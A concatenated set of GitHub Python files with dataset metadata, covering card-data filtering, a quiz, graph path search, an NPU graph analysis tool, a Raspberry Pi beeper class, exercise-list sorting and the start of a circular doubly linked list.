'planechase']\nscryData = scryData[~scryData['set_type'].isin(filter_settype_lst)]\n\n# filter cards with no price\nscryData = scryData[scryData['price'].notna()]\n\nprint(scryData.info(verbose = True))\nprint(' ')\nprint(scryData.shape)\n\n#######\n# save cleaned dataframe to csv\n#######\n\nscryData.to_csv('2020_09_25_data_processed/filtered_card_data.csv', index=False)\n","repo_name":"PatrickMal3/Magic-Card-Evaluation","sub_path":"pre_filter.py","file_name":"pre_filter.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"46582173654","text":"def main():\n print(\"Qual foi o time campeão da libertadores de 2019?\")\n resultado = input()\n\n if resultado.upper() == 'FLAMENGO':\n print(\"Certa resposta :)\")\n\n else:\n print(\"Errou :(\")\n\n print(\"Obrigado por jogar!\")\n\nif __name__ == '__main__':\n main()\n\n \n","repo_name":"SirLeonardoFerreira/Atividades-ifpi","sub_path":"Desafio quiz/desafio01_quiz.py","file_name":"desafio01_quiz.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
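The sqloperate record above builds a small Mongo-flavoured query layer on top of SQLAlchemy: create_table() generates a mapped class at runtime, and find()/count() route criteria through generate_conditions(), which understands $and, $ne, $gt/$lt/$gte/$lte, and a $regex operator that convert_regexp_to_like() down-converts to a SQL LIKE pattern. A minimal usage sketch, assuming the record's module is importable as sqloperate (that import path, and the table and column names here, are hypothetical):

from sqlalchemy import Integer, String
from sqloperate import SQLiteDatabase  # hypothetical import path for the record above

db = SQLiteDatabase("sqlite:///:memory:")

# Column types are plain SQLAlchemy type classes; keycolumn names the primary key.
db.create_table("users", {"id": Integer, "name": String, "age": Integer}, "id")

db.insert("users", {"id": 1, "name": "alice", "age": 31})
db.insert("users", {"id": 2, "name": "bob", "age": 19})

# Mongo-style criteria are translated into SQLAlchemy filters by generate_conditions().
print(db.find("users", {"age": {"$gte": 21}}))           # [{'id': 1, 'name': 'alice', 'age': 31}]
print(db.count("users", {"name": {"$regex": "^a.*$"}}))  # 1 -- matched via LIKE 'a%'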
+{"seq_id":"2773204877","text":"print(\"I'm running Python code on my own environment!\")\r\n# print(\"a\"-3)\r\n\r\nfruits = [\"apple\", \"bananna\", \"pineapple\", \"mango\"];\r\nprint(fruits[:-1])\r\n\r\nnumber_collection = [[100, 200], [100, 200], [475, 29], [34, 34]]\r\nnum_pairs = number_collection.count([100, 200])\r\n# print how many times [100, 200] appears\r\nprint(num_pairs)\r\n\r\n#Write your function here\r\ndef append_size(my_list):\r\n length = len(my_list)\r\n my_list.append(length)\r\n return my_list\r\n\r\n#Uncomment the line below when your function is done\r\nprint(append_size([23, 42, 108]))\r\n\r\nlist1 = [1,2,3,4,5]\r\nprint(\"list1:\", list1)\r\nlist1 = []\r\ndel list1[:]\r\nprint(\"list1:\", list1)\r\n\r\nfrom typing import List\r\nstr = [\"Jiho\", \"Adam\", \"Sonny\", \"Alisha\"]\r\ngarden_waitlist: List[str];\r\nprint(garden_waitlist)\r\n\r\n","repo_name":"tlockhart/pythone_practice","sub_path":"primitives_part1.py","file_name":"primitives_part1.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31952363691","text":"def find_path(graph, start, end, f_path=[]):\n if f_path is None:\n f_path = []\n f_path = f_path + [start]\n if start == end:\n return f_path\n if start not in graph:\n return None\n for node in graph[start]:\n if node not in f_path:\n f_newpath = find_path(graph, node, end, f_path)\n if f_newpath: return f_newpath\n return None\n\n\ndef find_all_paths(graph, start, end, f_a_path=[]):\n f_a_path = f_a_path + [start]\n if start == end:\n return [f_a_path]\n if start not in graph:\n return []\n paths = []\n for node in graph[start]:\n if node not in f_a_path:\n newpaths = find_all_paths(graph, node, end, f_a_path)\n for newpath in newpaths:\n paths.append(newpath)\n return paths\n\n\ndef find_shortest_path(graph, start, end, shortestLength=-1, f_s_path=[]):\n f_s_path = f_s_path + [start]\n if start == end:\n return f_s_path\n if start not in graph:\n return None\n shortest = None\n for node in graph[start]:\n if node not in f_s_path:\n if shortestLength == -1 or len(f_s_path) < (shortestLength - 1):\n newpath = find_shortest_path(graph, node, end, shortestLength, f_s_path)\n if newpath:\n if not shortest or len(newpath) < len(shortest):\n shortest = newpath\n shortestLength = len(newpath)\n return shortest\n","repo_name":"CaptainMills78/Classwork-Year-1-Term-1---2","sub_path":"Others/Graphs/London tube/Map/Algorithms.py","file_name":"Algorithms.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42082137036","text":"# coding=utf-8\n\"\"\"\nGraph Manager\n\"\"\"\nimport json\nimport os\nimport collections\nimport time\nfrom .op import Op\nfrom ..util.util import util\nfrom ..util.constant import Constant\nfrom ..util.precision_tool_exception import catch_tool_exception\nfrom ..util.precision_tool_exception import PrecisionToolException\nfrom ..config import config as cfg\n\nDANGEROUS_CAST = {\n 'DT_FLOAT': ['DT_INT32']\n}\n\nNO_DIG_OPS = ['AtomicAddrClean', 'NetOutput']\nCKPT_META_SHUFFIX='.meta'\n\nOP_CAST = 'Cast'\n\n\nclass NpuSubGraph(object):\n def __init__(self, graph_json, build_file, npu_graph):\n self.log = util.get_log()\n self.graph_name = graph_json['name']\n self.npu_graph = npu_graph\n self.graph = graph_json\n self.build_file = build_file\n self.ops_list = collections.OrderedDict()\n self.ops_type_list = {}\n self._prepare()\n 
self.graph_id = self._get_graph_id()\n\n def _prepare(self):\n self.log.debug(\"Graph %s operator count: %d\" % (self.graph_name, len(self.graph['op'])))\n for op_json in self.graph['op']:\n op_name = op_json['name']\n op_type = op_json['type']\n if op_name not in self.ops_list:\n self.ops_list[op_name] = []\n op = Op(op_json, self.ops_list, self.graph['name'], self.npu_graph, self)\n if op_type not in self.ops_type_list:\n self.ops_type_list[op_type] = {}\n self.ops_list[op_name] = op\n self.ops_type_list[op_type][op_name] = op\n\n def _get_graph_id(self):\n if 'attr' in self.graph:\n for item in self.graph['attr']:\n if item['key'] == '_session_graph_id':\n return item['value']['s']\n self.log.warning(\"Unknown sub graph id.\")\n return \"UNKNOWN\"\n\n def compare(self, sub_graph):\n \"\"\"compare with another sub graph\"\"\"\n if not isinstance(sub_graph, NpuSubGraph):\n raise PrecisionToolException(\"Should compare with another subgraph.\")\n right_ops_list = sub_graph.ops_list\n ignore_ops = [\"TransData\", \"Cast\", \"Recv\", \"Send\", \"Variable\", \"NetOutput\", \"NoOp\", \"Assign\", \"Constant\",\n \"StreamActive\"]\n similar_count = 0\n for op_name in self.ops_list:\n if self.ops_list[op_name].type() in ignore_ops:\n continue\n if op_name not in right_ops_list:\n self.log.warning(\"Can not Find [%s] %s in right subgraph.\", self.ops_list[op_name].type(), op_name)\n continue\n result, similar = self.ops_list[op_name].compare(right_ops_list[op_name])\n if not similar:\n util.print_panel(result, title=op_name)\n else:\n similar_count += 1\n for op_name in right_ops_list:\n if right_ops_list[op_name].type() in ignore_ops:\n continue\n if op_name not in self.ops_list:\n self.log.warning(\"Can not Find [%s] %s in left subgraph.\", right_ops_list[op_name].type(), op_name)\n self.log.info(\"Compare [%s] [%s], similarity is [%s / %s]\",\n self.graph_name, sub_graph.graph_name, similar_count, len(self.ops_list))\n\n def get_op(self, name):\n if name in self.ops_list:\n return [self.ops_list[name]]\n guess_op_list = []\n for op_detail in self.ops_list.values():\n if name in op_detail.name() or name == str(op_detail.name()).replace('/', '_'):\n guess_op_list.append(op_detail)\n return guess_op_list\n\n def get_parent_node_by_subgraph_name(self, graph_name):\n ops = []\n for op_detail in self.ops_list.values():\n if graph_name in op_detail.subgraph_names():\n ops.append(op_detail)\n return ops\n\n def get_op_by_type(self, op_type):\n ops = []\n for op_detail in self.ops_list.values():\n if op_type == op_detail.type():\n ops.append(op_detail)\n return ops\n\n def check_cast(self):\n cast_list = {}\n danger_cast_list = {}\n if OP_CAST in self.ops_type_list:\n cast_ops = self.ops_type_list[OP_CAST]\n for op in cast_ops.values():\n input_type = ''\n output_type = ''\n for input_desc in op.inputs():\n input_type = input_desc.dtype() if input_desc.dtype() != '' else input_type\n for output_desc in op.outputs():\n output_type = output_desc.dtype() if output_desc.dtype() != '' else output_type\n cast_type = \"%s -> %s\" % (input_type, output_type)\n if cast_type not in cast_list:\n cast_list[cast_type] = []\n cast_list[cast_type].append(op.name())\n for cast_type in cast_list:\n if self._is_dangerous_cast(cast_type):\n summary_txt = \"[green][Cast][/green][red][%s][/red] %s\" % (cast_type, cast_list[cast_type])\n util.print(summary_txt)\n\n @staticmethod\n def _is_dangerous_cast(cast_type):\n \"\"\"Check if cast \"\"\"\n cast_info = cast_type.split(\" -> \")\n input_dtype = cast_info[0]\n 
output_dtype = cast_info[1]\n if input_dtype in DANGEROUS_CAST:\n if output_dtype in DANGEROUS_CAST[input_dtype]:\n return True\n return False\n\n\nclass NpuGraph(object):\n def __init__(self, debug_id=Constant.DEFAULT_DEBUG_ID):\n self.log = util.get_log()\n self.build_files = None\n self.build_json_files = []\n self.debug_id = debug_id\n self.npu_root = os.path.join(cfg.NPU_DIR, debug_id)\n self.graph_root = os.path.join(self.npu_root, Constant.GRAPH)\n self.sub_graphs = collections.OrderedDict()\n self.ops_list = []\n util.create_dir(self.graph_root)\n\n @catch_tool_exception\n def prepare(self):\n \"\"\"prepare\"\"\"\n self._prepare_npu_graphs()\n if self.build_files is not None:\n for build_file in self.build_files:\n self._parse_ops(build_file)\n\n def check_cast(self):\n \"\"\"Check cast op type\"\"\"\n for sub_graph in self.sub_graphs.values():\n sub_graph.check_cast()\n\n def check_dtype(self):\n \"\"\"Check op input/output dtype\"\"\"\n for op in self.ops_list:\n input_dtype = ''\n for input_desc in op.inputs():\n input_dtype += ' ' + input_desc.dtype()\n output_dtype = ''\n for output_desc in op.outputs():\n output_dtype += ' ' + output_desc.dtype()\n util.print('[green][%s][/green] %s\\n - Input: %s\\n - Output: %s' % (\n op.type(), op.name(), input_dtype, output_dtype))\n\n def check_similarity(self):\n \"\"\"Check graph similarity.\"\"\"\n\n @catch_tool_exception\n def save_sub_graph(self, op, deep=0, dump_manager=None, compare_manager=None):\n \"\"\"Save sub graph\"\"\"\n if op is None:\n raise PrecisionToolException(\"Save sub graph failed as root operator is None.\")\n try:\n from graphviz import Digraph\n file_name_list = [self.debug_id, op.graph_name, op.type(), op.name().replace('/', '_').replace('.', '_'),\n str(deep), 'gv']\n file_name = '.'.join(file_name_list)\n path = os.path.join(cfg.OP_GRAPH_DIR, file_name)\n dot = Digraph(file_name, filename=path, node_attr={'shape': 'Mrecord'}, format='svg')\n dot_list = []\n edge_list = []\n self._gen_sub_graph(dot, op, deep, dot_list, edge_list, 'red', direction='all',\n dump_manager=dump_manager, compare_manager=compare_manager)\n dot.format = 'svg'\n dot.save(path)\n self.log.info(\"Sub graph saved to %s\" % os.path.abspath(cfg.OP_GRAPH_DIR))\n try:\n dot.view(path)\n time.sleep(1)\n except Exception as err:\n raise PrecisionToolException(\n \"graphviz not install, use [yum/apt-get] install graphviz xdg-utils. %s\" % err)\n except ImportError as err:\n raise PrecisionToolException(\"Save sub graph failed as import graphviz module failed. 
%s\" % err)\n\n def _gen_sub_graph(self, dot, op, deep, dot_list, edge_list, color='black', direction='all',\n dump_manager=None, compare_manager=None):\n \"\"\"Gen sub graph\"\"\"\n if deep == 0 or op.type() in NO_DIG_OPS:\n return\n if op.name() not in dot_list:\n dot.node(op.name(), self._gen_sub_graph_label(op), color=color, tooltip=op.summary(True))\n dot_list.append(op.name())\n # add input and output\n for desc in op.inputs():\n sub_op = self.get_op(desc.name(), op.graph_name)\n if len(sub_op) != 0:\n sub_op = sub_op[0]\n if direction in ['all', 'input']:\n self._gen_sub_graph(dot, sub_op, deep - 1, dot_list, edge_list, direction='input')\n if sub_op.name() in dot_list:\n src_edge = '%s:o%d' % (sub_op.name(), desc.peer_idx())\n else:\n dot.node(sub_op.name(), self._gen_sub_graph_label(sub_op), color=color, tooltip=op.summary(True))\n src_edge = '%s:o%d' % (sub_op.name(), desc.peer_idx())\n dst_edge = '%s:i%d' % (op.name(), desc.idx())\n if src_edge + dst_edge not in edge_list:\n dot.edge(src_edge, dst_edge)\n edge_list.append(src_edge + dst_edge)\n # add output\n for desc in op.outputs():\n for out_node_name in desc.names():\n sub_op = self.get_op(out_node_name, op.graph_name)\n if len(sub_op) != 0 and direction in ['all', 'output']:\n sub_op = sub_op[0]\n self._gen_sub_graph(dot, sub_op, deep - 1, dot_list, edge_list, direction='output')\n\n def _gen_sub_graph_label(self, op):\n input_labels = []\n for desc in op.inputs():\n input_labels.append(self._gen_sub_graph_desc(desc, 'i'))\n output_labels = []\n for desc in op.outputs():\n output_labels.append(self._gen_sub_graph_desc(desc, 'o'))\n str_cell = '|'\n return '{{ %s } | [%s] %s | { %s }}' % (str_cell.join(input_labels), op.type(), op.name(),\n str_cell.join(output_labels))\n\n @staticmethod\n def _gen_sub_graph_desc(desc, id_prefix):\n desc_str = r'<%s%d> [%d]' % (id_prefix, desc.idx(), desc.idx())\n desc_str = r'%s [%s]' % (desc_str, desc.dtype()) if desc.dtype() != '' else desc_str\n desc_str = r'%s\\n%s' % (desc_str, desc.shape()) if len(desc.shape()) != 0 else desc_str\n return desc_str\n\n def list_ops(self, op_type='', op_name='', pass_name='', kernel_name=''):\n \"\"\"list ops in graph\"\"\"\n return filter(lambda op: op_type in op.type() and op_name in op.name() and (\n pass_name == '' or pass_name in op.pass_name()) and kernel_name in op.kernel_name(), self.ops_list)\n\n def get_op(self, name, graph_name=None):\n \"\"\"get op by name\"\"\"\n # get op in specific sub graph\n if graph_name is not None and graph_name in self.sub_graphs:\n return self.sub_graphs[graph_name].get_op(name)\n ops = []\n for sub_graph in self.sub_graphs.values():\n ops.extend(sub_graph.get_op(name))\n # check if there is an exact match operation\n match_ops = list(filter(lambda x: x.name() == name, ops))\n if len(match_ops) != 0:\n return match_ops\n # return guess operations by name\n self.log.info(\"Can not find Operator named %s. 
You may mean the operator below.\", name)\n        guess_op_name_list = ['[green][%s][/green] %s' % (x.type(), x.name()) for x in ops]\n        util.print_panel(Constant.NEW_LINE.join(guess_op_name_list), title='Possible Operators')\n        return ops\n\n    def get_parent_node_by_subgraph_name(self, graph_name):\n        ops = []\n        for sub_graph in self.sub_graphs.values():\n            ops.extend(sub_graph.get_parent_node_by_subgraph_name(graph_name))\n        return ops\n\n    def _prepare_npu_graphs(self):\n        \"\"\"prepare ge graphs \"\"\"\n        # move graphs to precision data dir\n        graph_files = util.list_ge_graph_files(self.graph_root)\n        self.build_files = sorted(filter(lambda x: x.graph_name == cfg.BUILD_JSON_GRAPH_NAME, graph_files.values()),\n                                  key=lambda x: x.graph_id)\n        if len(self.build_files) == 0:\n            self.log.warning(\"Can not find any build files in dir: %s\", self.graph_root)\n        self.log.info(\"Find [%d] GE build files.\", len(self.build_files))\n\n    @catch_tool_exception\n    def _parse_ops(self, build_file):\n        \"\"\"Parse *_Build.txt.json to op objects.\"\"\"\n        build_file_json = build_file.path + '.json'\n        build_file_json = util.convert_proto_to_json(build_file.path, build_file_json)\n        if build_file_json is not None:\n            self.build_json_files.append(build_file_json)\n            with open(build_file_json, 'r') as f:\n                graph_json = json.load(f)\n                if 'graph' not in graph_json:\n                    raise PrecisionToolException(\"No graph in file: %s\" % build_file.file_name)\n                if len(graph_json['graph']) != 1:\n                    self.log.warning(\"There are more than one graph in ge build file, find %d\" % len(graph_json['graph']))\n                # sub_graphs = []\n                for graph in graph_json['graph']:\n                    npu_sub_graph = NpuSubGraph(graph, build_file, self)\n                    self.sub_graphs[graph['name']] = npu_sub_graph\n                    self.ops_list.extend(npu_sub_graph.ops_list.values())\n","repo_name":"Ascend/tools","sub_path":"precision_tool/lib/graph/npu_graph.py","file_name":"npu_graph.py","file_ext":"py","file_size_in_byte":13868,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"33158737400","text":"import math\n\nimport util\n\n\ndef q_inf(sheet, row, col):\n    # amount of information for a cell\n    base = sheet.nrows\n    value = 0\n    for row_ind in range(0, sheet.nrows):\n        if sheet.cell(row_ind, col).value == sheet.cell(row, col).value:\n            value += 1\n    l = math.log(value, base)\n    print(\"log(base=%s, value=%s) = %s | (row=%s,col=%s) \" % (base, value, l, row, col))\n    return l","repo_name":"G0DZ/Semantic","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13999279477","text":"from full_physics import *\nimport numpy as np\nimport math\n\nclass TemperatureEcmwf(TemperatureImpBase):\n    '''This class uses ECMWF data + offset to calculate the temperature'''\n    def __init__(self, ecmwf, press, temp_offset = 0.0, temp_flag = True):\n        coef = np.array([temp_offset])\n        flag = np.array([temp_flag])\n        TemperatureImpBase.__init__(self,coef, flag, press, False)\n        self.ecmwf = ecmwf\n\n    def offset(self):\n        return self.coefficient()[0]\n\n    def offset_uncertainty(self):\n        cov = self.statevector_covariance()\n        if(cov.shape[0] > 0 and cov[0,0] > 0):\n            return math.sqrt(cov[0,0])\n        else:\n            return 0\n\n    def clone(self, press = None):\n        if(not press):\n            press = self.pressure()\n        res = TemperatureEcmwf(self.ecmwf, press,\n                               self.coefficient().value()[0],\n                               self.used_flag_value()[0])\n        return res\n    \n    def calc_temperature_grid(self):\n        t = 
np.array(self.ecmwf.temperature(self.pressure().pressure_grid()))\n t += self.offset()\n self.tgrid = np_to_array_ad(t)\n\n def state_vector_name_i(self, i):\n return \"Temperature offset (Kelvin)\"\n\n def desc(self):\n return '''\nTemperatureEcmwf:\n Temperature offset: %f\n Retrieval flag: %s\n''' %(self.coefficient().value()[0], self.used_flag_value()[0].__str__()) + \\\n \" Pressure: \\n\" + self.pressure().__str__() + \\\n \" ECMWF:\\n\" + self.ecmwf.__str__()\n\n\nclass TemperatureEcmwfOutput(RegisterOutputBase):\n def __init__(self, temp):\n RegisterOutputBase.__init__(self)\n self.temp = temp\n\n def register_output(self, out):\n out.register_double(\"/RetrievalResults/temperature_offset_fph\",\n lambda : self.temp.offset().value())\n out.register_double(\"/RetrievalResults/temperature_offset_uncert_fph\",\n lambda : self.temp.offset_uncertainty())\n\n def register_output_apriori(self, out):\n frozen = self.temp.clone()\n out.register_double(\"/RetrievalResults/temperature_offset_apriori_fph\",\n lambda : frozen.offset().value())\n\n# We may want to create a base class for this at some point\nclass CreatorTemperatureEcmwf:\n def __init__(self,lg):\n self.c = lg.Creator.new(lg.Creator)\n self.c.initial_guess = self.initial_guess\n self.c.create = self.create\n self.c.register_output = self.register_output\n\n def create(self,c):\n self.temp = TemperatureEcmwf(c.config.ecmwf(c.config), \n c.config.pressure, \n c.initial_guess(c).apriori()[0])\n return self.temp\n\n def initial_guess(self,c):\n read_t = c.offset\n read_t.config = c.config\n ig = InitialGuessValue()\n ig.apriori(read_t.apriori(read_t))\n ig.apriori_covariance(read_t.covariance(read_t))\n return ig\n def register_output(self,c,ro):\n ro.push_back(ro, TemperatureEcmwfOutput(self.temp))\n\n\n\n","repo_name":"nasa/RtRetrievalFramework","sub_path":"python_experimental/temperature_ecmwf.py","file_name":"temperature_ecmwf.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"21"} +{"seq_id":"19943875593","text":"import os\nos.system('clear') or None\n\ndef manipulacao_arquivo(numero):\n nome_arquivo = str(numero) + \".json\"\n arquivo = open(nome_arquivo,\"r\")\n\n json_string = arquivo.read()\n\n retirados = [\"Exercicios\",\"\\n\",\"[\",\"]\",\"\\\"\",\":\",\" \",\"{\",\"}\"]\n\n clean_string = json_string\n\n for i in range(0,len(retirados)):\n clean_string = clean_string.replace(retirados[i],\"\")\n\n clean_list = clean_string.split(\",\")\n\n return clean_list\n\n\ndef print_categoria(categoria):\n\n if(categoria == 1):\n print(\"Iniciante\")\n elif(categoria == 2):\n print(\"AD-HOC\")\n elif(categoria == 3):\n print(\"Strings\")\n elif(categoria == 4):\n print(\"Estruturas e Bibliotecas\")\n elif(categoria == 5):\n print(\"Matemática\")\n elif(categoria == 6):\n print(\"Paradigmas\")\n elif(categoria == 7):\n print(\"Grafos\")\n elif(categoria == 8):\n print(\"Geometria Computacional\")\n elif(categoria == 9):\n print(\"SQL\")\n\ndef ordenacao_dificuldade(lista_completa,quantos):\n \n dificuldades = []\n exercicios = []\n \n for i in range(1,len(lista_completa),2):\n dificuldades.append(lista_completa[i])\n for i in range(0,len(lista_completa),2):\n exercicios.append(lista_completa[i])\n \n for i in range(0,len(exercicios)):\n for j in range(0,len(exercicios)-1):\n if(int(dificuldades[j]) > int(dificuldades[j+1])):\n \n aux = dificuldades[j]\n dificuldades[j] = dificuldades[j+1]\n dificuldades[j+1] = aux\n\n aux = exercicios[j]\n 
exercicios[j] = exercicios[j+1]\n                exercicios[j+1] = aux\n\n    x = 1\n    for i in range(0,len(exercicios)):\n        if(int(dificuldades[i]) == int(x)):\n            \n            print(\"\\n\" + \"----------\" + \"Dificuldade \" + str(x) + \"----------\")\n            x = x + 1\n        \n        print(exercicios[i])\n    \n    print(\"\")\n    \n    if(quantos != 0):\n        # group `quantos` exercises per printed line, as described in the quantos note below\n        # (the original repeated the same exercise quantos times on each line)\n        for i in range(0, len(exercicios), quantos):\n            print(\" \".join(exercicios[i:i+quantos]))\n\ndef ordenacao_exercicio(dificuldade,lista_completa,quantos):\n    \n    dificuldades = []\n    exercicios = []\n    \n    for i in range(1,len(lista_completa),2):\n        dificuldades.append(lista_completa[i])\n    for i in range(0,len(lista_completa),2):\n        exercicios.append(lista_completa[i])\n    \n    if(dificuldade == 1):\n        for i in range(0,len(exercicios)):\n            print(exercicios[i] + \"|\" + str(dificuldades[i]))\n    elif(dificuldade == 2):\n        for i in range(0,len(exercicios)):\n            print(exercicios[i])\n\n\n# Filtering\n\n'''\nCategories\n# [1] - Beginner (Iniciante)\n# [2] - AD-HOC\n# [3] - Strings\n# [4] - Structures and Libraries\n# [5] - Mathematics\n# [6] - Paradigms\n# [7] - Graphs\n# [8] - Computational Geometry\n# [9] - SQL\n'''\ncategoria = 1\n\n\n'''\nOrganization (how the output is ordered)\n[1] - Ascending order (by exercise number)\n[2] - Ascending order (by difficulty/level)\n'''\norganizacao = 2\n\n\n'''\nquantos = exercises printed per line (0 = full list)\nExample: 2\n1001 1002\n1003 1004\nExample: 3\n1001 1002 1003\n1004 1005 1006\n'''\nquantos = 0\n\n'''\nDifficulty\nPrint the difficulty next to each exercise?\n[1] - Yes\n[2] - No\n'''\ndificuldade = 0\nlista_completa = manipulacao_arquivo(categoria)\n\nif(organizacao == 1):\n    print_categoria(categoria)\n    ordenacao_exercicio(dificuldade, lista_completa, quantos)  # the original omitted quantos and raised TypeError\nif(organizacao == 2):\n    print_categoria(categoria)\n    ordenacao_dificuldade(lista_completa,quantos)\n","repo_name":"Donderileo/Scrapy-URI","sub_path":"sem_menus.py","file_name":"sem_menus.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29411712578","text":"# Beeper.py\n\n'''\nClass that represents an active buzzer on some GPIO pin.\n\n This software is part of the raspibrick module.\n It is Open Source Free Software, so you may\n  - run the code for any purpose\n  - study how the code works and adapt it to your needs\n  - integrate all or parts of the code in your own programs\n  - redistribute copies of the code\n  - improve the code and release your improvements to the public\n However the use of the code is entirely your responsibility.\n'''\n\nimport SharedConstants\nfrom RobotInstance import RobotInstance\nfrom Tools import Tools\nfrom threading import Thread\nimport RPi.GPIO as GPIO\nimport time\n\n\nclass Beeper():\n    '''\n    Abstraction of the beeper attached to a given pin (and ground).\n    @param pin: the GPIO pin number (default: 40)\n    '''\n    def __init__(self, pin = 40):\n        self._checkRobot()\n        self.robot = RobotInstance.getRobot()\n        self._pin = pin\n        self._beeperThread = None\n        Tools.debug(\"Beeper instance created with beeper at pin: \" + str(pin))\n        GPIO.setup(pin, GPIO.OUT)\n        self.turnOff()\n    \n    def turnOn(self):\n        '''\n        Turns the beeper on.\n        '''\n        Tools.debug(\"Beeper turned on\")\n        GPIO.output(self._pin, GPIO.HIGH)\n\n    def turnOff(self):\n        '''\n        Turns the beeper off.\n        '''\n        Tools.debug(\"Beeper turned off\")\n        GPIO.output(self._pin, GPIO.LOW)\n\n    def beep(self, count = 1):\n        '''\n        Emits a short beep the given number of times. 
Blocking until the beeps are played.\n @param count: the number of beeps\n '''\n self.start(60, 120, count, True)\n \n def start(self, onTime, offTime, count = 0, blocking = False):\n '''\n Starts beeping. The beeping period is offTime + onTime. \n May be stopped by calling stop(). If blocking is False, the\n function returns immediately while the blinking goes on. The blinking is stopped by setColor().\n @param onTime: the time in ms in on state\n @param offTime: the time in ms in off state\n @param count: total number of on states; 0 for endlessly (default)\n @param blocking: if True, the method blocks until the beeper has finished; otherwise\n it returns immediately (default: False)\n '''\n Tools.debug(\"Starting beeper with params onTime = \" + str(onTime) + \n \" offTime = \" + str(offTime) + \n \" count = \" + str(count) + \n \" blocking = \" + str(blocking))\n if self._beeperThread != None:\n self.stop()\n self._beeperThread = BeeperThread(self, onTime, offTime, count)\n if blocking:\n while self.isBeeping():\n continue\n\n def setOffTime(self, offTime):\n '''\n Sets the time the speaker is off.\n @param offTime: the offTime in ms\n '''\n if self._beeperThread != None:\n self._beeperThread._offTime = offTime\n\n def setOnTime(self, onTime):\n '''\n Sets the time the speaker is on.\n @param onTime: the onTime in ms\n '''\n if self._beeperThread != None:\n self._beeperThread._onTime = onTime\n\n def setOnOffTime(self, onTime, offTime):\n '''\n Sets the time the speaker is on and off.\n @param onTime: the onTime in ms\n @param offTime: the offTime in ms\n '''\n if self._beeperThread != None:\n self._beeperThread._onTime = onTime\n self._beeperThread._offTime = offTime\n \n def stop(self):\n '''\n Stops beeping.\n '''\n if self._beeperThread != None:\n self._beeperThread.stop()\n\n def isBeeping(self):\n '''\n @return: True, if the beeper is active; otherwise False\n '''\n time.sleep(0.001)\n return self._beeperThread != None\n \n \n def _checkRobot(self):\n if RobotInstance.getRobot() == None:\n raise Exception(\"Create Robot instance first\")\n\n\n\n\n# ------------------- class BeeperThread ----------------------\nclass BeeperThread(Thread):\n def __init__(self, beeper, onTime, offTime, count):\n Thread.__init__(self)\n self._beeper = beeper\n self._onTime = onTime\n self._offTime = offTime\n self._count = count\n self._isAlive = True\n self.start()\n\n def run(self):\n Tools.debug(\"Beeper thread started\")\n nb = 0\n self._isRunning = True\n while self._isRunning:\n if self._onTime <= 0:\n self._beeper.turnOff()\n time.sleep(0.01)\n else:\n self._beeper.turnOn()\n startTime = time.time()\n while time.time() - startTime < self._onTime / 1000 and self._isRunning:\n time.sleep(0.001)\n if not self._isRunning:\n break\n \n self._beeper.turnOff()\n startTime = time.time()\n while time.time() - startTime < self._offTime / 1000 and self._isRunning:\n time.sleep(0.001)\n if not self._isRunning:\n break\n\n nb += 1\n if nb == self._count:\n self._isRunning = False\n self._beeper.turnOff()\n self._beeper._beeperThread = None\n self._isAlive = False\n Tools.debug(\"Beeper thread finished\")\n\n def stop(self):\n self._isRunning = False\n while self._isAlive: # Wait until thread is finished\n continue\n","repo_name":"raspibrick/install","sub_path":"lib/Beeper.py","file_name":"Beeper.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72501255094","text":"from ..Linear.DLL import DLL\r\nfrom 
..nodes.DNode import DNode\r\n\r\n\r\nclass CDLL(DLL):\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n self.size = 0\r\n\r\n def __init__(self, head=None):\r\n if head is None:\r\n self.head = None\r\n self.tail = None\r\n self.size = 0\r\n else:\r\n self.head = head\r\n self.tail = head\r\n self.head.prev = self.tail\r\n self.tail.next = self.head\r\n self.size = 1\r\n\r\n def InsertHead(self, node):\r\n if self.head is None:\r\n self.head = node\r\n self.tail = node\r\n node.prev = node\r\n node.next = node\r\n else:\r\n node.next = self.head\r\n self.head.prev = node\r\n self.head = node\r\n node.prev = self.tail\r\n self.tail.next = node\r\n self.size += 1\r\n\r\n def InsertTail(self, node):\r\n if self.head is None:\r\n self.head = node\r\n self.tail = node\r\n node.prev = node\r\n node.next = node\r\n else:\r\n node.prev = self.tail\r\n node.next = self.head\r\n self.tail.next = node\r\n self.head.prev = node\r\n self.tail = node\r\n self.size += 1\r\n\r\n def Insert(self, node, position):\r\n if position < 1 or position > self.size + 1:\r\n print(\"Invalid position!\")\r\n return\r\n if position == 1:\r\n if self.head is None: # empty list\r\n self.head = node\r\n self.tail = node\r\n node.prev = node # self-referencing\r\n node.next = node # self-referencing\r\n else:\r\n node.next = self.head\r\n self.head.prev = node\r\n self.head = node\r\n self.head.prev = self.tail # link head to tail\r\n self.tail.next = self.head # link tail to head\r\n elif position == self.size + 1:\r\n self.tail.next = node\r\n node.prev = self.tail\r\n self.tail = node\r\n self.head.prev = self.tail # link head to tail\r\n self.tail.next = self.head # link tail to head\r\n else:\r\n current = self.head\r\n for i in range(1, position - 1):\r\n current = current.next\r\n node.next = current.next\r\n current.next.prev = node\r\n current.next = node\r\n node.prev = current\r\n self.size += 1\r\n\r\n def Search(self, node):\r\n if self.head is None:\r\n return None\r\n curr_node = self.head\r\n while True:\r\n if curr_node.data == node.data:\r\n return curr_node\r\n curr_node = curr_node.next\r\n if curr_node is self.head:\r\n break\r\n return None\r\n\r\n def SortedInsert(self, node):\r\n if self.head is None: # 